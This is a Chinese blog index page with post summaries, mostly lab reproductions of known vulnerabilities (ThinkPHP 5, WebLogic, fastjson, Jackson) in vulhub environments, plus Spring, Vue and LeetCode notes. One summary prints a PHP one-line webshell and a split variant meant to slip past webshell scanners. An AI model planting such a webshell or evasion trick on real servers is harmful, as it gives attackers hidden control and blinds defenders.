上一页 1 2 3 4 5 6 ··· 8 下一页
2020年10月20日
【漏洞复现系列】ThinkPHP 5 远程命令执行
摘要: 使用vulhub搭建环境: https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce 启动docker容器: docker-compose up -d 访问8080端口: http://your-ip:8080 执行whoami命令: h 阅读全文
posted @ 2020-10-20 20:07 ABKing 阅读(548) 评论(0) 推荐(0) 编辑
【漏洞复现系列】WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)
摘要: 使用vulhub环境: https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 启动测试环境: docker-compose up -d 访问7001端口: http://your-ip:7001/ 出现404即可 接 阅读全文
posted @ 2020-10-20 18:29 ABKing 阅读(312) 评论(0) 推荐(0) 编辑
【漏洞复现系列】前言
摘要: 小小实习生一枚,最近要做蜜罐相关的工作,需要涉及到漏洞复现,借此机会,特地写一个系列。 预计数量在两百个左右,欢迎关注我! 我会写明复现过程,还会尽可能地在文章末尾附上python脚本 在系列文章连载结束后,考虑写一个综合项目,覆盖这两百个漏洞。 届时源码也会在Github上开源,敬请期待! 阅读全文
posted @ 2020-10-20 18:28 ABKing 阅读(101) 评论(2) 推荐(0) 编辑
2020年9月14日
Jackson远程代码执行漏洞复现(不使用vulhub,手写transletBytecodes字段)
摘要: 今天花了一天的时间复现Jackson远程代码执行漏洞,查询vulhub可以看到存在CVE-2017-7525的漏洞环境,根据网上的教程,的确可以复现成功。 但是!我发现很多教程都只是复现一遍而已,根本就不知道原理,很明显的一点就是:他们根本不知道如何修改transletBytecodes的值! 接下 阅读全文
posted @ 2020-09-14 21:16 ABKing 阅读(2391) 评论(5) 推荐(1) 编辑
2020年9月13日
fastjson远程命令执行漏洞复现
摘要: fastjson远程命令执行漏洞复现 使用vulhub提供的docker环境:https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce 在192.168.199.225目标机器上运行测试环境: docker-compose up 阅读全文
posted @ 2020-09-13 21:31 ABKing 阅读(715) 评论(0) 推荐(0) 编辑
2020年8月16日
一句话木马免杀(截止2020年8月16日通杀D盾、安全狗,微步,webshellKiller)
摘要: 首先一句话木马: <?php assert($_POST['a']); ?> D盾扫描,5级 分开写: 1 <?php 2 $a = "assert"; 3 $b = $_POST['a']; 4 $a($b); 5 6 ?> D盾扫描,4级 使用可变函数的技巧(PHP 支持可变函数的概念。这意味着 阅读全文
posted @ 2020-08-16 23:13 ABKing 阅读(3503) 评论(0) 推荐(1) 编辑
2020年5月23日
Access to DialectResolutionInfo cannot be null when 'hibernate.dialect' not set
摘要: spring boot启动的时候,报了这个错误 发现很多都是让我们添加方言 例如: database-platform: org.hibernate.dialect.OracleDialect 然而我发现问题根本不是这个 我在连接数据的url处添加了时区设置就不报错了 jdbc:mysql://lo 阅读全文
posted @ 2020-05-23 23:22 ABKing 阅读(5135) 评论(1) 推荐(1) 编辑
2020年5月21日
JWT简洁版
摘要: 添加Constant类 1 package top.bigking.constant; 2 3 /** 4 * @Author ABKing 5 * @since 2020/5/14 下午5:58 6 **/ 7 8 public class Constant { 9 10 /** 11 * 数据请 阅读全文
posted @ 2020-05-21 23:11 ABKing 阅读(247) 评论(0) 推荐(0) 编辑
2020年5月20日
Vue设置token拦截以及给每个api加上Authorization请求头
摘要: 登录页面的代码 Login.vue 关键代码为第34行 this.$store.commit("set_token", response.data.data); set_token是store/index.js中mutations里的函数名 1 <template> 2 <div> 3 <el-fo 阅读全文
posted @ 2020-05-20 13:16 ABKing 阅读(8673) 评论(0) 推荐(0) 编辑
2020年5月13日
【LeetCode 排序专题】#524通过删除字母匹配到字典里最长单词
摘要: 给定一个字符串和一个字符串字典,找到字典里面最长的字符串,该字符串可以通过删除给定字符串的某些字符来得到。如果答案不止一个,返回长度最长且字典顺序最小的字符串。如果答案不存在,则返回空字符串。 示例 1: 输入:s = "abpcplea", d = ["ale","apple","monkey", 阅读全文
posted @ 2020-05-13 22:00 ABKing 阅读(192) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 ··· 8 下一页